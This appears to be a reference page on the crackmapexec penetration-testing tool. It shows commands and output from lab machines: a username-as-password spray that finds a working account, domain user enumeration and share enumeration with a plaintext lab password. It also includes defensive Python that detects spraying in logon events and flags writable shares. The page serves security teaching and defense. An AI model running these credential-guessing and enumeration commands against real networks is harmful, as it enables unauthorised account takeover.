crackmapexec

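1. Overview

It is mainly used as a password-guessing tool for discovering internal account lists, but beyond that it is the alpha and omega of internal network (AD environment) penetration testing. Because there are cases where the ID is also used as the password, knowing only the ID can be said to be 50% of a successful attack.

Development now continues as nxc; development and support of crackmapexec have been discontinued.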

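2. Usage

2.1. Basic usage

It can be used as shown below. When a login succeeds, the program exits automatically; with --continue-on-success, it keeps going so you can check whether other accounts also succeed even after one account has succeeded.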

┌──(root㉿kali)-[/home/kali/labs/Monteverde]
└─# crackmapexec smb 10.129.23.156 -u users.txt -p users.txt --continue-on-success
SMB         10.129.23.156   445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:Guest STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:mhope STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:SABatchJobs STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:svc-ata STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:sbc-bexec STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:svc-netapp STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:dgalanos STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:roleary STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:smorgan STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:Guest STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:mhope STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:SABatchJobs STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-ata STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:sbc-bexec STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-netapp STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:dgalanos STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:roleary STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:smorgan STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:Guest STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-ata STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:sbc-bexec STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-netapp STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:dgalanos STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:roleary STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:smorgan STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:Guest STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE 
SMB         10.129.23.156   445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.129.23.156   445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:svc-ata STATUS_LOGON_FAILURE 
[...SNIP...]
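
Seen from the defender's side, the run above is a burst of failed logons against many distinct accounts from a single source, followed by one success. The following is an added example, not part of the original page, that flags this pattern over constructed logon events; the CSV layout, source addresses, window and threshold are assumptions, while 4625 and 4624 are the Windows failed and successful logon event IDs.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample, sorted by time: timestamp, event ID, source IP, account.
# 4625 = failed logon, 4624 = successful logon.
SAMPLE_EVENTS = """\
2024-01-01T10:00:00,4625,10.10.14.5,Guest
2024-01-01T10:00:01,4625,10.10.14.5,AAD_987d7f2f57d2
2024-01-01T10:00:02,4625,10.10.14.5,mhope
2024-01-01T10:00:03,4625,10.10.14.5,svc-ata
2024-01-01T10:00:04,4624,10.10.14.5,SABatchJobs
2024-01-01T10:00:05,4625,10.10.14.5,svc-netapp
2024-01-01T10:05:00,4625,10.10.20.7,dgalanos
2024-01-01T10:45:00,4625,10.10.20.7,dgalanos
2024-01-01T10:46:00,4624,10.10.20.7,dgalanos
"""

def detect_spray(lines, window=timedelta(minutes=5), min_accounts=4):
    """Flag sources that fail against >= min_accounts distinct accounts
    inside `window`; successes in the same window are reported as
    accounts to treat as compromised."""
    recent = defaultdict(deque)  # source -> (time, event_id, account)
    findings = {}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ts, event_id, src, account = line.split(",")
        when = datetime.fromisoformat(ts)
        q = recent[src]
        q.append((when, event_id, account.lower()))
        # Drop events that have aged out of the sliding window.
        while when - q[0][0] > window:
            q.popleft()
        failed = {a for _, e, a in q if e == "4625"}
        if len(failed) >= min_accounts:
            hit = findings.setdefault(
                src, {"accounts": set(), "compromised": set()})
            hit["accounts"] |= failed
            hit["compromised"] |= {a for _, e, a in q if e == "4624"}
    return findings

if __name__ == "__main__":
    for src, hit in detect_spray(SAMPLE_EVENTS.splitlines()).items():
        print(src, sorted(hit["accounts"]), sorted(hit["compromised"]))
```

The second source in the sample, a single user mistyping a password twice before logging in, stays below the distinct-account threshold and is not flagged.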

2.2. Extracting users

The --users option extracts the users on the server.

┌──(root㉿kali)-[/home/kali/labs/Flight]
└─# crackmapexec smb 10.129.37.19 -u svc_apache -p 'S@Ss!K@*t13' --users
SMB         10.129.37.19    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.129.37.19    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.129.37.19    445    G0               [+] Enumerated domain user(s)
SMB         10.129.37.19    445    G0               flight.htb\O.Possum                       badpwdcount: 0 desc: Helpdesk                                                                                                                 
SMB         10.129.37.19    445    G0               flight.htb\svc_apache                     badpwdcount: 0 desc: Service Apache web                                                                                                       
SMB         10.129.37.19    445    G0               flight.htb\V.Stevens                      badpwdcount: 0 desc: Secretary                                                                                                                
SMB         10.129.37.19    445    G0               flight.htb\D.Truff                        badpwdcount: 0 desc: Project Manager                                                                                                          
SMB         10.129.37.19    445    G0               flight.htb\I.Francis                      badpwdcount: 0 desc: Nobody knows why he's here                                                                                               
SMB         10.129.37.19    445    G0               flight.htb\W.Walker                       badpwdcount: 0 desc: Payroll officer                                                                                                          
SMB         10.129.37.19    445    G0               flight.htb\C.Bum                          badpwdcount: 0 desc: Senior Web Developer                                                                                                     
SMB         10.129.37.19    445    G0               flight.htb\M.Gold                         badpwdcount: 0 desc: Sysadmin                                                                                                                 
SMB         10.129.37.19    445    G0               flight.htb\L.Kein                         badpwdcount: 0 desc: Penetration tester                                                                                                       
SMB         10.129.37.19    445    G0               flight.htb\G.Lors                         badpwdcount: 0 desc: Sales manager                                                                                                            
SMB         10.129.37.19    445    G0               flight.htb\R.Cold                         badpwdcount: 0 desc: HR Assistant                                                                                                             
SMB         10.129.37.19    445    G0               flight.htb\S.Moon                         badpwdcount: 0 desc: Junion Web Developer                                                                                                     
SMB         10.129.37.19    445    G0               flight.htb\krbtgt                         badpwdcount: 0 desc: Key Distribution Center Service Account                                                                                  
SMB         10.129.37.19    445    G0               flight.htb\Guest                          badpwdcount: 0 desc: Built-in account for guest access to the computer/domain                                                                 
SMB         10.129.37.19    445    G0               flight.htb\Administrator                  badpwdcount: 0 desc: Built-in account for administering the computer/domain                                                                   

2.3. Checking shared folders

The --shares option shows, like smbmap, the folders that are shared to a specific account.

┌──(root㉿kali)-[/home/kali/labs/Flight]
└─# crackmapexec smb 10.129.37.19 -u s.moon -p 'S@Ss!K@*t13' --shares
SMB         10.129.37.19    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB         10.129.37.19    445    G0               [+] flight.htb\s.moon:S@Ss!K@*t13 
SMB         10.129.37.19    445    G0               [+] Enumerated shares
SMB         10.129.37.19    445    G0               Share           Permissions     Remark
SMB         10.129.37.19    445    G0               -----           -----------     ------
SMB         10.129.37.19    445    G0               ADMIN$                          Remote Admin
SMB         10.129.37.19    445    G0               C$                              Default share
SMB         10.129.37.19    445    G0               IPC$            READ            Remote IPC
SMB         10.129.37.19    445    G0               NETLOGON        READ            Logon server share 
SMB         10.129.37.19    445    G0               Shared          READ,WRITE      
SMB         10.129.37.19    445    G0               SYSVOL          READ            Logon server share 
SMB         10.129.37.19    445    G0               Users           READ            
SMB         10.129.37.19    445    G0               Web             READ            
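
For a share-permission audit, the table above can be turned into structured data so that shares an ordinary account can write to stand out. This is an added example, not part of the original page or of the tool; it assumes share names contain no spaces and that the permissions column only ever holds READ and WRITE, as in the output shown.

```python
import re

# Rows taken from the --shares output above; column whitespace is
# condensed here because the parser splits on whitespace, not offsets.
SAMPLE_OUTPUT = """\
SMB  10.129.37.19  445  G0  [+] flight.htb\\s.moon:S@Ss!K@*t13
SMB  10.129.37.19  445  G0  [+] Enumerated shares
SMB  10.129.37.19  445  G0  Share     Permissions  Remark
SMB  10.129.37.19  445  G0  -----     -----------  ------
SMB  10.129.37.19  445  G0  ADMIN$                 Remote Admin
SMB  10.129.37.19  445  G0  C$                     Default share
SMB  10.129.37.19  445  G0  IPC$      READ         Remote IPC
SMB  10.129.37.19  445  G0  NETLOGON  READ         Logon server share
SMB  10.129.37.19  445  G0  Shared    READ,WRITE
SMB  10.129.37.19  445  G0  SYSVOL    READ         Logon server share
SMB  10.129.37.19  445  G0  Users     READ
SMB  10.129.37.19  445  G0  Web       READ
"""

PERM_RE = re.compile(r"^(READ|WRITE)(,(READ|WRITE))*$")

def parse_shares(output):
    """Return {share: {"permissions": [...], "remark": str}}."""
    shares, in_table = {}, False
    for line in output.splitlines():
        # Four prefix fields (protocol, host, port, name), then the payload.
        parts = line.split(None, 4)
        if len(parts) < 5 or parts[0] != "SMB":
            continue
        tokens = parts[4].split()
        if tokens[:2] == ["Share", "Permissions"]:
            in_table = True          # header row: the table starts here
            continue
        if not in_table or set(tokens[0]) == {"-"}:
            continue                 # banner lines and the dashed rule
        # The permissions column may be empty (ADMIN$, C$), in which case
        # the second token already belongs to the remark.
        has_perms = len(tokens) > 1 and bool(PERM_RE.match(tokens[1]))
        perms = tokens[1].split(",") if has_perms else []
        remark = " ".join(tokens[2:] if has_perms else tokens[1:])
        shares[tokens[0]] = {"permissions": perms, "remark": remark}
    return shares

def writable_shares(shares):
    """Names of shares on which the account holds WRITE."""
    return sorted(n for n, s in shares.items() if "WRITE" in s["permissions"])

if __name__ == "__main__":
    print(writable_shares(parse_shares(SAMPLE_OUTPUT)))
```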